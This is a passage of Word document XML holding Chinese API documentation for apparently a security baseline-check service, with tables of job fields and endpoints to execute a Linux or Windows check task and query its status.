          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0841CEA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA17086" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="115D48BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA27D11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A4BEC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5636DA30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>持续时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B9B9E1F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42BC6AAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51555DE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52FFD502" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B968D24" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C0DD06B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>failedHostCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19018BD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B5D7676" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6926F9A7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B19D15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>successHostCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE403FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F793D06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>成功主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EC0A2E5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174459DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>progress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3437E666" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F8EA79A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5BC1E680" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F36373C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>passRate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DF1BF02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E396AC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>通过率</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F0761B1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38B49BA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C47019" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220D306C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态：0-Pending；1-Running；2-Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="093BC7ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="355" w:name="_Toc115166250"/>
      <w:bookmarkStart w:id="356" w:name="执行任务-1"/>
      <w:bookmarkEnd w:id="354"/>
      <w:r>
        <w:t>执行任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="355"/>
    </w:p>
    <w:p w14:paraId="5571960E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01967174" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}/execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B24DE"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836"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="51C6A65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C121532" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC3D526" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FD4CCED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F004D73" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE9512B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DDBC37A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E6E587" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59A813B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20090C47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //任务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628CD7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660427A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success" //执行结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E304C9"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CAC500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13B4AEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AB5E02E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E661124" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71AB0149" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09879828" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E4E80F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35A763C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10CAD236" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485D385E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B4848E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F210507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FEF0DF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="_Toc115166251"/>
      <w:bookmarkStart w:id="358" w:name="查询任务执行任务"/>
      <w:bookmarkEnd w:id="356"/>
      <w:r>
        <w:t>查询任务执行任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>
    </w:p>
    <w:p w14:paraId="20F7F7AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5891A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C9A1CE"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836"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="393E24A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D51433E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018D481E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="241448EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21DE1CEF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20120D3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F923C57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5821C061" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6108D28A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81F08B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //任务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5DA5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C701C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "success" //查询结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149BB032"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="64DDD67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3C32889" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F6D65A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="788A1894" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5FF5B0C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D79278A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BEE953A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADF9F79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5FC194FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F8BE1F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64689D7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C6EBFD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="207D5C25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
